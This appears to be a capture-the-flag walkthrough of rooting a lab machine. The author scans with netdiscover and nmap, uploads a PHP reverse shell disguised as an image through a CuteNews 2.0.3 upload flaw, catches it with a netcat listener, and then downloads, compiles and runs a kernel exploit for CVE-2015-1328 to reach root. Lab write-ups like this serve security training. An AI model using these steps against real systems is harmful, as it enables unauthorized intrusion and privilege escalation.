netdiscover
1 | sudo netdiscover |

192.168.0.27
nmap
1 | nmap -sV 192.168.0.27 |
Port 80

As we can see it’s running CuteNews v.2.0.3.
Les’t see if I can exploit it.
https://www.exploit-db.com/exploits/37474
1 | # Exploit : |
I have to register first, I’m gonna use the name user1.
Download the revershell
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
You have to change the IP address and the port.
You have to put the IP address of your computer, I always use the port 4648.
Save the file as rc.jpg.
Tamper data exploit
Open burpsuit.
Proxy -> intercept -> open browser:
go to this page: http://192.168.0.27/index.php?mod=main&opt=personal
You have to forward to send the Request.
Now send the file rc.jpg in the form.

Rename the file in rc.php.

You can close burpsuit now.
netcat
You have to listen with netcat.
1 | nc -nlvp 4648 |
Now you can open the revers-shell.

Now I have a shell.

CVE-2015-1328
1 | uname -a |
Let’s go.
https://www.exploit-db.com/exploits/37292
I download the exploit on his computer in /tmp.
1 | wget https://www.exploit-db.com/download/37292 -O exp.c |
Then use gcc:
1 | gcc exp.c -o ofs |
And run it.
1 | ./ofs |
I’m root
